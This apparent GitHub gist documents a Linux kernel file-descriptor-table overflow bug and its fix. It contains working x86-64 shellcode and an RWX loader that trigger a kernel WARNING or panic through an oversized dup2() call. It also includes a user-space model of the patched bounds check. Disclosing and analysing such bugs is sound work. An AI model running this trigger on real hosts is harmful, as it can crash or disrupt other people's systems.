@emdnaia
Created October 20, 2025 00:03
/*
## File Descriptor INT_MAX Overflow
----
- Info:
Tweet: https://x.com/spendergrsec/status/1958264076162998771
Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370
----
**Bug:** systemd sets `fs.nr_open` to roughly 2^30 (1073741816). When a process calls `dup2()` with an FD number near this limit, the kernel tries to allocate a file descriptor table of more than 8 GB, which exceeds INT_MAX (2,147,483,647 bytes).
**Impact:** Triggers a kernel WARNING in mm/slub.c. The allocation always fails, but the WARNING produces log noise or a panic.
**Root Cause:** Missing bounds check in `alloc_fdtable()`: it did not validate the allocation size against INT_MAX before calling kvmalloc.
**Incoming Fix:** Added check: `if (nr > INT_MAX / sizeof(struct file *)) return -EMFILE;`
- Compile like:
gcc shellcode.c -o shellcode_exec
./shellcode_exec
*/
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* x86-64 Linux syscall stub, unchanged from the gist: raises RLIMIT_NOFILE to
 * 1073741816 (the systemd fs.nr_open value described above), calls dup2() on
 * stdin with a target FD just below that limit to force the oversized fdtable
 * allocation, then calls exit(0). It never returns to the caller. */
unsigned char shellcode[] = {
    0x40, 0xb7, 0x40, 0xc1, 0xe7, 0x18, 0x83, 0xef,
    0x08, 0x57, 0x57, 0x31, 0xff, 0x40, 0xb7, 0x07,
    0x31, 0xc0, 0xb0, 0xa0, 0x48, 0x89, 0xe6, 0x0f,
    0x05, 0x5e, 0xff, 0xce, 0x31, 0xff, 0xb0, 0x21,
    0x0f, 0x05,
    0x31, 0xc0, 0xb0, 0x3c, 0x31, 0xff, 0x0f, 0x05
};

int main(void)
{
    printf("Shellcode size: %zu bytes\n", sizeof(shellcode));

    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(shellcode),
                          PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    // Copy shellcode to executable memory
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    printf("Executing shellcode...\n");
    // Execute it
    void (*func)(void) = (void (*)(void))exec_mem;
    func();

    printf("Done\n"); // Not reached: the shellcode ends with exit(0)
    return 0;
}
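The arithmetic behind the bug and the fix, as an added user-space model that is neither the gist's code nor the kernel's: it mirrors how alloc_fdtable() sizes the table (power-of-two rounding, then a clamp to fs.nr_open rounded up to a multiple of BITS_PER_LONG), applies the INT_MAX bounds check from the referenced commit, and derives the largest fs.nr_open for which the fd array stays below INT_MAX. The clamp formula, the "dup2(0, fd) needs fd + 1 slots" rule and an 8-byte `struct file *` are assumptions drawn from fs/file.c on x86-64; bitmap allocations are ignored.

```c
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

#define BITS_PER_LONG 64   /* x86-64 */
#define FILE_PTR_SIZE 8    /* sizeof(struct file *) on x86-64 (assumption) */

/* Smallest power of two >= n (n > 0), like the kernel's roundup_pow_of_two(). */
static uint64_t roundup_pow_of_two(uint64_t n)
{
    uint64_t p = 1;
    while (p < n) p <<= 1;
    return p;
}

/* Slots alloc_fdtable() sizes the table to: round up to a power of two, then
 * clamp to fs.nr_open rounded up to a multiple of BITS_PER_LONG (model). */
uint64_t fdtable_slots(uint64_t slots_wanted, uint64_t nr_open)
{
    uint64_t nr = roundup_pow_of_two(slots_wanted);
    if (nr > nr_open)
        nr = ((nr_open - 1) | (BITS_PER_LONG - 1)) + 1;
    return nr;
}

/* The fix's bounds check: 0 if the allocation proceeds, -EMFILE if the fd
 * array would exceed INT_MAX and is refused before kvmalloc() can warn. */
int alloc_fdtable_check(uint64_t slots_wanted, uint64_t nr_open)
{
    if (fdtable_slots(slots_wanted, nr_open) > (uint64_t)INT_MAX / FILE_PTR_SIZE)
        return -EMFILE;
    return 0;
}

/* Largest fs.nr_open for which this model's fd array stays below INT_MAX:
 * INT_MAX / 8 rounded down to a multiple of BITS_PER_LONG. */
uint64_t safe_nr_open_ceiling(void)
{
    return ((uint64_t)INT_MAX / FILE_PTR_SIZE) & ~(uint64_t)(BITS_PER_LONG - 1);
}

int main(void)
{
    uint64_t nr_open = 1073741816, wanted = 1073741815 + 1; /* gist values; dup2(0, fd) needs fd + 1 */
    printf("slots=%llu bytes=%llu check=%d safe_nr_open=%llu\n",
           (unsigned long long)fdtable_slots(wanted, nr_open),
           (unsigned long long)(fdtable_slots(wanted, nr_open) * FILE_PTR_SIZE),
           alloc_fdtable_check(wanted, nr_open), (unsigned long long)safe_nr_open_ceiling());
    return 0;
}
```

With the gist's numbers the model yields 1073741824 slots, an 8589934592-byte array request and -EMFILE from the patched check; a host keeping fs.nr_open at or below the computed ceiling cannot reach the oversized request at all.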